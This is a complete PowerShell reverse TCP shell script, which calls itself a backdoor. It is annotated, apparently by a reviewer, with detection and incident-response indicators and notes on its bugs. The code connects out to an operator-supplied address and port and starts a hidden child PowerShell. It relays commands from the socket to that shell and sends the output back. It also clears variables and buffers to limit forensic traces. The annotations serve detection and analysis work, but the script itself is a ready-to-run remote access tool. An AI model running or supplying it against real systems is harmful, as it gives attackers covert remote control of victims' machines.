# Interactive reverse TCP shell (PowerShell). Prompts for a remote address and
# port, opens an OUTBOUND TCP connection to it, starts a hidden child "powershell"
# with stdin/stdout/stderr redirected, and relays bytes from the socket into the
# child's stdin and the child's stdout back over the socket until the child
# exits or the remote end closes the connection.
#
# Detection / IR notes (all grounded in the code below):
#   - powershell.exe opening an outbound Net.Sockets.TcpClient to an
#     operator-supplied host:port (see New-Object ... TcpClient below).
#   - a child powershell.exe started with CreateNoWindow, WindowStyle Hidden,
#     UseShellExecute=$false and all three standard streams redirected.
#   - the banner strings "PowerShell Reverse TCP v4.0", "Backdoor is up and
#     running..." and "Backdoor will now exit..." are written to the local
#     console only (Write-Host), never to the socket.
#   - stderr of the child is collected but never forwarded (see the loop).
#
# Both prompts are read from the local console and whitespace-trimmed.
$addr = $(Read-Host -Prompt "Enter address").Trim();
Write-Host "";
# NOTE(review): $port stays a string here; the TcpClient constructor call below
# relies on PowerShell's implicit conversion to the (string, int) overload.
$port = $(Read-Host -Prompt "Enter port number").Trim();
Write-Host "";
# Refuse to run with either value empty; no further validation of the address
# or of the port range is performed.
if ($addr.Length -lt 1 -or $port.Length -lt 1) {
Write-Host "Both parameters are required";
} else {
Write-Host "PowerShell Reverse TCP v4.0 by Ivan Sincek.";
Write-Host "GitHub repository at github.com/ivan-sincek/powershell-reverse-tcp.";
# Pre-set every resource handle to $null so the finally block can test each
# one and clean up only what was actually created.
$client = $stream = $buffer = $writer = $process = $stderr = $stdout = $stderrEvent = $stdoutEvent = $null;
try {
# Outbound connection to the remote operator; this is the network indicator.
$client = New-Object Net.Sockets.TcpClient($addr, $port);
$stream = $client.GetStream();
# ReadTimeout is in milliseconds, so socket reads give up after 5 ms; the
# relay loop below is therefore a tight poll rather than a blocking read.
$stream.ReadTimeout = 5;
$buffer = New-Object Byte[] 1024;
# UTF-8 writer over the socket used to send the child's output back.
$writer = New-Object IO.StreamWriter($stream, [Text.Encoding]::UTF8, 1024);
$writer.AutoFlush = $true;
# Start the hidden child shell whose stdio is bridged to the socket. The
# process-creation indicator: parent powershell -> child "powershell",
# no window, all standard streams redirected.
$process = New-Object Diagnostics.Process;
$process.StartInfo = New-Object Diagnostics.ProcessStartInfo;
$process.StartInfo.FileName = "powershell";
$process.StartInfo.CreateNoWindow = $true;
$process.StartInfo.WindowStyle = [Diagnostics.ProcessWindowStyle]::Hidden;
$process.StartInfo.UseShellExecute = $false;
$process.StartInfo.RedirectStandardInput = $process.StartInfo.RedirectStandardError = $process.StartInfo.RedirectStandardOutput = $true;
# Suppress possible error dialogs; EnableRaisingEvents is left off, so the
# loop detects termination by polling HasExited rather than via an Exited event.
$process.StartInfo.ErrorDialog = $false;
$process.EnableRaisingEvents = $false;
# Line buffers filled asynchronously by the two Register-ObjectEvent handlers.
$stderr = New-Object Text.StringBuilder;
$stdout = New-Object Text.StringBuilder;
# Shared event action: $EventArgs.Data is the received line, $Event.MessageData
# is whichever StringBuilder was passed via -MessageData when registering.
$scriptBlock = {
if ($EventArgs.Data.Length -gt 0) {
$Event.MessageData.AppendLine($EventArgs.Data);
}
};
$stderrEvent = Register-ObjectEvent -InputObject $process -EventName "ErrorDataReceived" -Action $scriptBlock -MessageData $stderr;
$stdoutEvent = Register-ObjectEvent -InputObject $process -EventName "OutputDataReceived" -Action $scriptBlock -MessageData $stdout;
$process.Start() | Out-Null;
$process.BeginErrorReadLine();
$process.BeginOutputReadLine();
# Local console only; nothing is sent to the remote end here.
Write-Host "Backdoor is up and running...";
Write-Host "";
# Relay loop: runs until the child shell exits or the remote end closes.
while (!$process.HasExited) {
try {
$bytes = $stream.Read($buffer, 0, $buffer.Length); # returns within ReadTimeout (5 ms); a timeout surfaces as an exception, caught below
if ($bytes -gt 0) {
# Raw socket bytes are handed to the child's stdin unmodified.
$process.StandardInput.Write($buffer, 0, $bytes);
} else { break; } # 0 bytes = remote end closed the connection
} catch [Management.Automation.MethodInvocationException] {}
# NOTE: the empty catch above swallows every MethodInvocationException, not
# only the read-timeout case, so other socket read failures are also ignored.
# This branch tests $stderr but writes and clears $stdout: the child's stderr
# is never forwarded over the socket and accumulates in $stderr until exit.
if ($stderr.Length -gt 0) {
$writer.Write($stdout.ToString()); $stdout.clear();
}
# Forward any buffered child stdout to the remote end.
if ($stdout.Length -gt 0) {
$writer.Write($stdout.ToString()); $stdout.clear();
}
}
Write-Host "Backdoor will now exit...";
} catch {
# Prints the inner exception message to the local console; if the caught
# exception has no InnerException this prints an empty line (presumably
# unintended — verify).
Write-Host $_.Exception.InnerException.Message;
} finally {
# Teardown in reverse order of creation; each handle is checked against
# $null because any step in the try block may have failed before it was set.
if ($stderrEvent -ne $null) {
Unregister-Event -SourceIdentifier $stderrEvent.Name;
Clear-Variable stderrEvent;
}
if ($stdoutEvent -ne $null) {
Unregister-Event -SourceIdentifier $stdoutEvent.Name;
Clear-Variable stdoutEvent;
}
# Close() releases the handle but does not kill a still-running child;
# nothing here terminates the child shell explicitly.
if ($process -ne $null) {
$process.Close(); $process.Dispose();
Clear-Variable process;
}
if ($writer -ne $null) {
$writer.Close(); $writer.Dispose();
Clear-Variable writer;
}
if ($stream -ne $null) {
$stream.Close(); $stream.Dispose();
Clear-Variable stream;
}
if ($client -ne $null) {
$client.Close(); $client.Dispose();
Clear-Variable client;
}
# Buffers are zeroed/emptied and the variables removed before exit, which
# limits what remains in the session for memory forensics.
if ($buffer -ne $null) {
$buffer.Clear();
Clear-Variable buffer;
}
if ($stderr -ne $null) {
$stderr.Clear();
Clear-Variable stderr;
}
if ($stdout -ne $null) {
$stdout.Clear();
Clear-Variable stdout;
}
[GC]::Collect();
}
}
# The prompt values are removed from the session as well.
Clear-Variable addr;
Clear-Variable port;